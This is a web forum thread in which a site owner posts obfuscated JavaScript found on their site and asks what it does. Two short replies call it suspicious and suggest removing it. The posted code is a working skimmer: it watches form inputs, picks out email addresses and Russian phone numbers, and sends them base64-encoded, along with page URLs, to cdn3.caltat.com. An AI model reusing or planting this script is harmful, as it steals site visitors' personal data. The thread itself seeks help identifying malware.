Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
L
L
linuxnb2018-02-16 13:40:14
JavaScript
linuxnb, 2018-02-16 13:40:14

I found this code on my site, what is it?

I found this code on my website, apparently flew in with a bunch of other scripts from the public
, I can’t understand what this code does, it’s in JS

var _0x47fd = ['location', '&r=', 'text/javascript', 'cookie', 'split', 'substring', 'indexOf', '\x20undefined', 'host', 'getFullYear', ';\x20expires=', ';\x20path=', ';\x20path=/', ';\x20domain=', 'length', ';\x20secure', 'createElement', 'script', 'type', 'async', 'src', 'https://cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/jdata.php?s=', '&a=', 'getElementsByTagName', 'head', 'appendChild', 'test', 'body', 'change', 'input', 'INPUT', 'target', 'value', '//cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/udt.php?n=', '&u='];
(function(_0x224e74, _0xcd7334) {
  var _0x14ff53 = function(_0x4e3dd6) {
    while(--_0x4e3dd6) {
      _0x224e74['push'](_0x224e74['shift']());
    }
  };
  _0x14ff53(++_0xcd7334);
}(_0x47fd, 0x11b));
var _0x430d = function(_0x4b111b, _0x2bf227) {
  _0x4b111b = _0x4b111b - 0x0;
  var _0x327e53 = _0x47fd[_0x4b111b];
  return _0x327e53;
};
! function(_0x2e8a61) {
  function _0x14d842(_0x5421c3) {
    try {
      return function(_0x46d4a3) {
        var _0x135912, _0x344da9 = document[_0x430d('0x0')][_0x430d('0x1')](';\x20'),
          _0x3cb8d7 = [];
        for(_0x135912 in _0x344da9)
          if(_0x344da9[_0x135912][_0x430d('0x2')]) {
            var _0x4b8eec = _0x344da9[_0x135912][_0x430d('0x3')]('='),
              _0x3b0145 = _0x344da9[_0x135912][_0x430d('0x2')](0x0, _0x4b8eec),
              _0x52b38d = _0x344da9[_0x135912][_0x430d('0x2')](_0x4b8eec + 0x1);
            _0x3cb8d7[_0x3b0145] = _0x52b38d;
          }
        return '' != _0x46d4a3 && _0x430d('0x4') != _0x46d4a3 && null != _0x46d4a3 ? void 0x0 !== _0x3cb8d7[_0x46d4a3] ? _0x3cb8d7[_0x46d4a3] : null : _0x3cb8d7;
      }(_0x5421c3 = 'caltat') != lh && (_0x479993 = _0x5421c3, _0x2f4b75 = lh, _0x5284ce = '', _0xa5b5d8 = new Date(), _0xc01cbb = location[_0x430d('0x5')]['split']('.'), _0x5284ce = new Date(_0xa5b5d8[_0x430d('0x6')]() + 0x6, 0xa, 0xa, 0xa, 0xa, 0xa), document[_0x430d('0x0')] = _0x479993 + '=' + escape(_0x2f4b75) + (_0x5284ce ? _0x430d('0x7') + _0x5284ce : '') + (_0x5aad13 ? _0x430d('0x8') + _0x5aad13 : _0x430d('0x9')) + (_0x1b93f2 ? _0x430d('0xa') + _0x1b93f2 : _0x430d('0xa') + _0xc01cbb[_0xc01cbb[_0x430d('0xb')] - 0x2] + '.' + _0xc01cbb[_0xc01cbb[_0x430d('0xb')] - 0x1]) + (_0x2924b9 ? _0x430d('0xc') : '')), lh;
    } catch(_0x274ee0) {
      return lh;
    }
    var _0x479993, _0x2f4b75, _0x5284ce, _0x5aad13, _0x1b93f2, _0x2924b9, _0xa5b5d8, _0xc01cbb;
  }

  function _0x50c03a(_0x10cc0d, _0x2318f3) {
    var _0x57f10b = document[_0x430d('0xd')](_0x430d('0xe'));
    _0x57f10b[_0x430d('0xf')] = 'text/javascript', _0x57f10b[_0x430d('0x10')] = !0x0, _0x57f10b[_0x430d('0x11')] = _0x430d('0x12') + _0x14d842() + _0x430d('0x13') + encodeURIComponent(btoa(_0x10cc0d)) + '&l=' + encodeURIComponent(btoa(_0x2318f3)), document[_0x430d('0x14')](_0x430d('0x15'))[0x0][_0x430d('0x16')](_0x57f10b);
  }

  function _0x599c2e(_0x3d06b4) {
    /^[a-zA-Z0-9\-]{2,30}@[a-z0-9\-]{2,30}\.[a-z0-9\-]{2,10}$/i ['test'](_0x3d06b4) ? _0x50c03a(_0x3d06b4, ''): (/^\+7[0-9\(\)\ \-]{10,15}$/i ['test'](_0x3d06b4) || /^8[0-9\(\)\ \-]{10,15}$/i [_0x430d('0x17')](_0x3d06b4)) && _0x50c03a('', _0x3d06b4);
  }
  window['lh'] = 'dfcb074b365c4571abdb669e656badb8';
  var _0x44d79a = !0x0;
  try {
    $(_0x430d('0x18'))['on'](_0x430d('0x19'), _0x430d('0x1a'), function() {});
  } catch(_0x55054e) {
    _0x44d79a = !0x1;
  }
  'function' == typeof window['jQuery'] && 0x1 == _0x44d79a ? setTimeout(function() {
    $(_0x430d('0x18'))['on'](_0x430d('0x19'), _0x430d('0x1a'), function() {
      _0x599c2e($(this)['val']());
    });
  }, 0x1f4) : setTimeout(function() {
    document[_0x430d('0x14')]('body')[0x0]['addEventListener']('change', function(_0x47747a) {
      _0x430d('0x1b') == _0x47747a[_0x430d('0x1c')]['nodeName'] && _0x599c2e(_0x47747a[_0x430d('0x1c')][_0x430d('0x1d')]);
    });
  }, 0x1f4);
  var _0x5b3bef = _0x430d('0x1e') + new Date()['getTime']();
  _0x5b3bef += _0x430d('0x1f') + encodeURIComponent(_0x2e8a61[_0x430d('0x20')]['href']), _0x5b3bef += _0x430d('0x21') + _0x2e8a61['referrer'];
  var _0x1ee212 = document[_0x430d('0xd')](_0x430d('0xe'));
  _0x1ee212[_0x430d('0xf')] = _0x430d('0x22'), _0x1ee212[_0x430d('0x10')] = !0x0, _0x1ee212[_0x430d('0x11')] = _0x5b3bef, _0x2e8a61[_0x430d('0x14')]('head')[0x0]['appendChild'](_0x1ee212), _0x14d842();
}(document);

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
A
Andrey Tsvetkov, 2018-02-16
@yellow79

A piece of obfuscated code, what exactly it does is difficult to say, that's why it is obfuscated so that it is not clear, but it looks like the result of what it does is sent to cdn3.caltat.com. If this address means nothing to you, I would take it out of harm's way. Judging by the info on the main domain, this is a code from some kind of CRM

Report
M
Maxim, 2018-04-21
@maxus99

More information here - ulogin.reformal.ru/proj/?mod=one&ia=1070795

Similar questions
A
Azat Kiberov2021-03-20 17:56:44
How to send your request for a site with socket io through the browser? 2Reply
I
iSensei2014-05-09 17:40:23
Title in Tooltip on Bootstrap 3? 4Reply
S
Sergey Burduzha2021-03-25 12:00:33
Why is a fetch request not working? 3Reply
V
Vell122016-06-19 01:04:52
How to make such a line at the top of the site? 4Reply
L
Ledauph12022-01-21 15:51:46
How to open a second window via a button in PyQt5? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question